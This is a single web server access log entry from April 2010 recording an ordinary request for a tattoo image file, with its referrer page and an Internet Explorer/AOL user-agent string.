195.93.21.6 - - [09/Apr/2010:04:54:55 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.155; Windows NT 5.1; Trident/4.0; FBSMTWB; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
